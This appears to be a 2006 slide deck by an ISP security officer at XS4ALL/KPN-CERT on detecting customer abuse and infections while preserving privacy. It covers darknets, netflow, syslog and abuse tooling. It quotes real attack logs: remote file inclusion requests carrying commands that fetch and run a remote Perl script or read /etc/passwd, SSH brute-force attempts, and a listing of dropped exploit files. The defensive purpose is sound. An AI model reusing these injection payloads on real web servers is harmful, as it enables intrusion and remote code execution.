I walk the line.

etherealattractiveΑσφάλεια

14 Ιουν 2012 (πριν από 5 χρόνια και 5 μήνες)

361 εμφανίσεις

I walk the line.
Privacy & Security
Scott A. McIntyre
KPN-CERT
/
XS4ALL
&
Security Officer says: “NO!”

4 hackers to 250 employees

Strong company ethics in security & privacy

Lawsuits (which we usually win)

Bound by Dutch privacy laws

Our Terms of Use cover abuse

Dedicated Abuse Centre

We are determined to not be part of the problem, but not at the
cost of customer’s online privacy.
Our network
adsl
sara
paalbergweg
singel
switch
dialup
100Mbit
1Gbps
1Gbps
100Mbit
100Mbit
Internet
1Gbps
100Mbit
XS4ALL.net circa 2000
But, we’re a small country.
More people started getting DSL....
XS4ALL 2006
ADSL/Internet only
adsl
sara
telecity
singel
dialup
2 x 100Mbit
Internet
Internet
10Gbps
1Gbps
Drentestraat
Packets vs. Privacy
Privacy-sensitive
tooling.

Flow based, ip headers only.

My own netflow scripts, nfdump, Arbor

Darknets, honeynets, etc.

Malware analysis.

Common sense and
experience.
A picture is worth
1k words

Using our graphing tools to give us an
indication of issues

Keeps customers details completely private

Helps us shape policy

Quick way to spot trends

...great for presentation slides!
Darknet Wormwatch
Sometimes the
problem is just too
obvious...
6.4 Mpps does not fit into 2Mbit DSL
3.1Gbps does not fit into 100Mbit FE
pps of evil heading towards customers.
pps of individual customers with infections
Darknets
What makes a
good darknet?

Some RFC 1918 space

True Darknet space

Many ways to observe what hits it

Gives a good measure of automated
activity to and from customers

Can be used in combination with
honeypots to gather malware
Daily darknet output
StartTime Type Dport InPkt OutPkt InBytes OutBytes
15 Sep 06 22:59:43 tcp 445 86534 0 5526468 0
15 Sep 06 22:59:48 udp 1026 70579 0 34870313 0
15 Sep 06 22:59:42 tcp 135 62357 0 4345070 0
15 Sep 06 22:59:46 tcp 139 49543 0 3309646 0
15 Sep 06 22:59:48 udp 1027 44443 0 21924826 0
15 Sep 06 23:21:47 icmp 13054 0 1558536 0
15 Sep 06 22:59:50 tcp 80 8670 0 599420 0
15 Sep 06 23:21:17 tcp 4899 5550 0 345296 0
15 Sep 06 23:02:09 tcp 1433 4669 0 309658 0
15 Sep 06 23:50:51 tcp 22 3629 0 266222 0
15 Sep 06 23:13:54 udp 137 3526 0 324392 0
15 Sep 06 23:11:58 tcp 5900 2715 0 177654 0
15 Sep 06 23:02:34 udp 1029 1892 0 1092089 0
15 Sep 06 23:07:10 udp 1025 1875 0 948475 0
15 Sep 06 23:02:34 udp 1028 1872 0 1075389 0
15 Sep 06 23:23:59 tcp 25 1713 0 109278 0
16 Sep 06 00:03:57 tcp 3128 1099 0 63954 0
15 Sep 06 23:54:01 tcp 15118 1092 0 67704 0
15 Sep 06 23:00:54 tcp 4662 1085 0 69346 0
Darknet traffic
Tessa
(not a darknet)
Use the log, Luke.
Syslog solves

Most servers and services support it

A bit more pattern recognition required to
spot the trends

Once you know you have an incident,
reviewing syslogs can give extra insight

Example sources:

WWW logs

Authentication logs

Email logs
Syslog examples
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-4/0/0.42 D tcp 80.126.89.xxx 10.56.64.1 58466 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 82.92.124.xxx 192.168.2.200 14156 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-2/1/1.160 D tcp 83.68.4.xxx 213.244.168.218 2160 445 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-1/0/1.0 D tcp 62.251.173.xx 62.251.44.237 3890 445 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 80.126.106.xxx 192.168.167.20 20348 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 82.92.157.xx 10.10.11.3 29266 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-4/0/0.42 D tcp 82.92.216.xxx 192.168.25.11 26953 135 (1 packets)
Jun 3 16:25:30 lo0..xs4all.net: FW: ge-5/0/0.42 D tcp 80.126.65.xx 10.90.0.2 11749 135 (1 packets)
Jun 3 16:25:32 lo0..xs4all.net: FW: ge-2/1/1.160 D tcp 200.118.94.33 62.216.26.210 3666 1433 (1 packets)
Jun 3 10:07:16 localhost sshd[562]: Illegal user
nicu
from 202.216.232.227
Jun 3 10:07:19 localhost sshd[564]: Illegal user
ciprian
from 202.216.232.227
Jun 3 10:07:22 localhost sshd[566]: Illegal user
diana
from 202.216.232.227
Jun 3 10:07:24 localhost sshd[568]: Illegal user
carmen
from 202.216.232.227
Jun 3 10:07:27 localhost sshd[570]: Illegal user
dumitru
from 202.216.232.227
Jun 3 10:07:30 localhost sshd[572]: Illegal user
constantin
from 202.216.232.227
Jun 3 10:07:32 localhost sshd[574]: Illegal user
nicolae
from 202.216.232.227
Jun 3 10:07:34 localhost sshd[576]: Illegal user
matei
from 202.216.232.227
Jun 3 10:07:37 localhost sshd[578]: Illegal user
victor
from 202.216.232.227
Jun 3 10:07:39 localhost sshd[580]: Illegal user
dragos
from 202.216.232.227

Router firewall packet drops
SSH authentication drops
HTTP server logs
217.16.16.222 - - [03/Jun/2006:11:28:54 +0200] x.websites.xs4all.nl "GET /index.php?_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.x.at/tool25.txt?&cmd=cd%20/tmp/;lwp-
download%20http://www.x.at/alba.txt;perl%20alba.txt;rm%20-rf%20alba.*? HTTP/1.0" 200 45 "-" "Mozilla/5.0"
81.214.183.54 - - [02/Jun/2006:21:33:21 +0200] www.xs4all.nl "GET /modules/coppermine/themes/default/theme.php?
THEME_DIR=http://www.x.x.net/cmd/tool25.jpg?cmd=id HTTP/1.0" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0b;
Windows NT 5.0)"
85.99.88.59 - - [02/Jun/2006:22:48:41 +0200] www.xs4all.nl "GET /ashnews/ashheadlines.php?pathtoashnews=http://
uol.x.x.pt/tool25/tool25.png?&cmd=id HTTP/1.0" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
85.98.96.80 - - [03/Jun/2006:04:24:08 +0200] www.xs4all.nl "GET /modules/Forums/admin/index.php?
phpbb_root_path=http://xpl.x.com/tool25.dot?&cmd=id HTTP/1.0" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0b;
Windows NT 5.0)"
213.171.218.188 - - [02/Jun/2006:07:29:48 +0200] x.websites.xs4all.nl "GET /index.php?site=http://busca.x.x.br/
uol/index.html?&cmd=id HTTP/1.1" 200 966 "-" "-"
69.41.179.178 - - [02/Jun/2006:07:44:51 +0200] x.websites.xs4all.nl "GET /index.php?pagina=
http://x.x.us/cmd.gif?
&cmd=cat%20/etc/passwd
HTTP/1.1" 403 - "-" "libwww-perl/5.803"
200.162.113.11 - - [02/Jun/2006:16:52:30 +0200] x.websites.xs4all.nl "GET
http://www.x-x.nl/site.php?page=http://
www.x.de/mitglieder_profil_files/Moderator/Table/Moderator/Jobs/www/src/tool25.txt?&cmd=id
HTTP/1.0" 200 7482 "-"
"-"
85.98.152.24 - - [01/Aug/2006:17:34:48 +0200]
www.x.nl
"GET /index.php?mosConfig_absolute_path=
http://6x.1.x.244/
x/tool25.txt?&cmd=id
HTTP/1.0" 200 6654 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
HTTP server logs
217.16.16.222 - - [03/Jun/2006:11:28:54 +0200] x.websites.xs4all.nl "GET /index.php?_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://www.x.at/tool25.txt?&cmd=cd%20/tmp/;lwp-
download%20http://www.x.at/alba.txt;perl%20alba.txt;rm%20-rf%20alba.*?
HTTP/1.0" 200 45 "-" "Mozilla/5.0"
81.214.183.54 - - [02/Jun/2006:21:33:21 +0200] www.xs4all.nl "GET /modules/coppermine/themes/default/theme.php?
THEME_DIR=http://www.x.x.net/cmd/tool25.jpg?cmd=id
HTTP/1.0" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0b;
Windows NT 5.0)"
85.99.88.59 - - [02/Jun/2006:22:48:41 +0200] www.xs4all.nl "GET /ashnews/ashheadlines.php?
pathtoashnews=http://
uol.x.x.pt/tool25/tool25.png?&cmd=id
HTTP/1.0" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
85.98.96.80 - - [03/Jun/2006:04:24:08 +0200] www.xs4all.nl "GET /modules/Forums/admin/index.php?
phpbb_root_path=http://xpl.x.com/tool25.dot?&cmd=id
HTTP/1.0" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0b;
Windows NT 5.0)"
213.171.218.188 - - [02/Jun/2006:07:29:48 +0200] x.websites.xs4all.nl "GET /
index.php?site=
http://busca.x.x.br/
uol/index.html?&cmd=id
HTTP/1.1" 200 966 "-" "-"
69.41.179.178 - - [02/Jun/2006:07:44:51 +0200] x.websites.xs4all.nl "GET /index.php?
pagina=
http://x.x.us/cmd.gif?
&cmd=cat%20/etc/passwd
HTTP/1.1" 403 - "-" "libwww-perl/5.803"
200.162.113.11 - - [02/Jun/2006:16:52:30 +0200] x.websites.xs4all.nl "GET
http://www.x-x.nl/
site.php?page=http://
www.x.de/mitglieder_profil_files/Moderator/Table/Moderator/Jobs/www/src/tool25.txt?&cmd=id
HTTP/1.0" 200 7482 "-"
"-"
85.98.152.24 - - [01/Aug/2006:17:34:48 +0200]
www.x.nl
"GET /index.php?mosConfig_
absolute_path=
http://6x.1.x.244/
x/tool25.txt?&cmd=id
HTTP/1.0" 200 6654 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
Other places to
find malware
/tmp & friends
12 -rwxrwxrwx 1 klant wheel 5092 May 9 06:32 /www/tmp/ppp
28 -rwxrwxrwx 1 klant wheel 14080 May 9 06:39 /www/tmp/yim
8 -rw-r--r-- 1 klant wheel 2100 May 9 06:27 /www/tmp/dc.pl
24 -rwxrwxrwx 1 klant wheel 11788 May 9 06:29 /www/tmp/rootbsd
64 -rwxrwxrwx 1 klant wheel 32768 May 9 06:42 /www/tmp/fbsd48local
4 -rw-r--r-- 1 klant wheel 1457 May 9 06:32 /www/tmp/ppp.c
4 -rw-r--r-- 1 klant wheel 1026 May 9 06:34 /www/tmp/maelx.c
92 -rwxrwxrwx 1 klant wheel 97356 May 9 06:36 /www/tmp/bsdlocal
12 -rwxrwxrwx 1 klant wheel 5169 May 9 06:34 /www/tmp/maelx
Amount Rate/s Rate/min Key
814 81.40 4884.0 82.92.65.xx.32776
www.xz.nl
. (29)
638 63.80 3828.0 82.92.65.xx.32776 A?
www.xz.nl
.
1100 110.00 6600.0 213.84.213.xxx.37274 xz.xz.net. (34)
Domain name: sbcglobal.net
Expected query count: 97
Observed query count: 2583
Domain name: x.xxx.94.82.in-addr.arpa
Expected query count: 242
Observed query count: 44285
DNS abuse checkers
USER PID Run Time Sys Time State Command
klant2 11723 1D 12:52:23 0.61 select php4 /htdocs/administrator/
components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.x.com/x/malware.txt?
klant4 519 0D 11:19:40 0.41 select ñ∙p?Ῠ÷î
klant5 98164 0D 05:12:29 12541.38 nochan ifconfig
klant8 25349 0D 02:22:57 8.60 select httpd
klant5 32991 0D 04:40:05 12014.82 nochan [x-dot-net]
klant6 8370 0D 03:22:18 5.30 select /WWW/klant/htdocs/.kernel
klant6 8371 0D 03:22:15 3.18 select /WWW/klant/htdocs/.kernel/httpd
ls /proc/evil
Other tools that don’t
invade privacy

Abuse handling stuff

Tools to notify, filter, review

VIRBL (mostly a NL thing though...)

SMTP logs for viruses outbound

Daily incoming virus detection logs

Third parties firewall reporters

MyNetWatchman

Dshield
Abuse tooling

You need the tools to respond to the threat.

Ingress/Egress network filtering

Default customer filtering (135/445, etc)

A Walled Garden

We combine features with privacy protection

Ticketing system to track issues and history
Law Enforcement &
Legislation

No one (sane) is in favour of online crime

Working with LEA in co-operative ventures can be fruitful

You’re the tech experts, educate them!

Lawful Interception

Providers
must
stay active in keeping this from being abused.

CIOT & Data Retention

How necessary is it for the government to know everything
about your online existence, now and in the future?
So...the balance...

Develop investigation skills in lieu of tech toys.

But can be time consuming and have higher error rate

Sadly, education does
not
work, some tech
needed.

People’s behaviour does not change

Smart company policies and procedures can
help.

Abuse Centre, “Walled Garden” and proactive abuse detection

Use the data you have more efficiently.

Watch your
infrastructure
, not your
customers
.

Syslog, sendmail, errors, flow, snmp, whatever.

Darknets, honeypots, friendly customers, malware analysis.

Provide tools to customers to help report
abuse

Personal firewalls, D-Shield, MyNetWatchman, anti-malware
products.
So...the balance...
The future...
Tomorrow

IPv6

Does anything good happen here?

VoIP

Money money money

Don’t apply old paradigms to new technologies

Embedded systems

If it can communicate, it can probably be compromised

PDA, GSM, PVR/Satellite systems

Any new product or service
must
have
abuse and security evaluated
Summary

Build secure products

Security officer must play a role in review!

Have pro-active abuse/security policies

Stay vigilant of new threats

Be creative in how you investigate security
incidents.

Be able to step in technically as needed

SQL Slammer by way of example

Accept some trade-offs.

Police involvement,
when handled correctly
, helps fight online
crime.
Any questions?